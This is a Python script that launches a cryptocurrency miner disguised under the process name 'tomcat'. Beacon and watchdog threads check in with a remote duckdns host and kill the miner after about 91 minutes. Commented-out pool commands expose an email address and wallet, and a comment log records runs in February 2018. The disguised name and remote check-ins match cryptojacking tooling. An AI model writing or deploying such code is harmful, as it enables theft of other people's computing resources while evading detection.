import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:45:09.585128
#2018-02-17 16:32:07.840403
#2018-02-17 18:20:07.693759
#2018-02-17 20:07:05.139565
#2018-02-17 21:54:05.073775
#2018-02-17 23:39:07.467091
#2018-02-18 01:28:07.802993
#2018-02-18 03:15:07.392155
#2018-02-18 05:04:06.046751
#2018-02-18 06:56:06.677840
#2018-02-18 08:44:03.489592
#2018-02-18 10:31:02.259037
#2018-02-18 12:16:06.395920
#2018-02-18 14:03:07.674437
#2018-02-18 15:53:06.036772
#2018-02-18 17:43:06.932871
#2018-02-18 19:30:02.244061
#2018-02-18 21:15:06.446954
#2018-02-18 23:03:03.885091
#2018-02-19 00:49:06.162945
#2018-02-19 02:36:04.013649
#2018-02-19 04:22:03.224979
#2018-02-19 06:06:04.530520
#2018-02-19 07:54:03.515921
#2018-02-19 09:44:07.751965
#2018-02-19 11:34:08.324693
#2018-02-19 13:21:08.606403
#2018-02-19 15:09:05.932260
#2018-02-19 16:55:10.990825
#2018-02-19 18:42:04.279189
#2018-02-19 20:29:07.491709
#2018-02-19 22:17:01.533244
#2018-02-20 00:02:05.423101
#2018-02-20 01:49:02.174961
#2018-02-20 03:37:07.217812
#2018-02-20 05:24:03.929224
#2018-02-20 07:08:05.536098
#2018-02-20 08:54:01.826862
#2018-02-20 10:38:02.013793
#2018-02-20 12:24:08.498123
#2018-02-20 14:11:02.238202
#2018-02-20 15:54:04.845629
#2018-02-20 17:41:07.005873
#2018-02-20 19:31:01.920938
#2018-02-20 21:18:07.908573
#2018-02-20 23:02:07.228811
#2018-02-21 00:45:08.119129
#2018-02-21 02:30:09.549919
#2018-02-21 04:17:02.121206
#2018-02-21 06:04:05.367371
#2018-02-21 07:51:04.941394
#2018-02-21 09:38:08.357840
#2018-02-21 11:26:04.756140
#2018-02-21 13:15:01.451282
#2018-02-21 15:01:08.770599
#2018-02-21 16:49:08.761875
#2018-02-21 18:34:06.809734
#2018-02-21 20:18:01.552585
#2018-02-21 22:07:05.732332
#2018-02-21 23:57:05.938137
#2018-02-22 01:46:07.444827
#2018-02-22 03:33:01.364322
#2018-02-22 05:21:07.590328
#2018-02-22 07:05:03.902181
#2018-02-22 08:52:05.880483
#2018-02-22 10:41:01.589130
#2018-02-22 12:27:04.688273
#2018-02-22 14:11:07.232939
#2018-02-22 15:57:11.153172
#2018-02-22 17:43:09.820678
#2018-02-22 19:29:08.254876
#2018-02-22 21:21:07.768059
#2018-02-22 23:07:07.579624
#2018-02-23 00:54:02.206841
#2018-02-23 02:41:03.938567
#2018-02-23 04:28:05.343364
#2018-02-23 06:14:01.776094
#2018-02-23 08:01:01.605989
#2018-02-23 10:07:01.251556
#2018-02-23 11:59:10.168812
#2018-02-23 13:48:01.768566
#2018-02-23 15:38:06.368166
#2018-02-23 17:27:07.303313
#2018-02-23 19:16:01.646406
#2018-02-23 20:59:05.681910
#2018-02-23 22:54:01.475577
#2018-02-24 00:42:01.388616
#2018-02-24 02:33:01.880712
#2018-02-24 04:26:01.498321
#2018-02-24 06:12:04.633803
#2018-02-24 07:59:05.389694
#2018-02-24 09:43:07.633964
#2018-02-24 11:39:07.277587
#2018-02-24 13:29:05.488231
#2018-02-24 15:18:01.854315
#2018-02-24 17:08:01.564970
#2018-02-24 18:59:02.122370
#2018-02-24 20:46:06.698488
#2018-02-24 23:01:06.041075
#2018-02-25 02:18:07.793556
#2018-02-25 05:34:03.698719
#2018-02-25 11:34:06.423798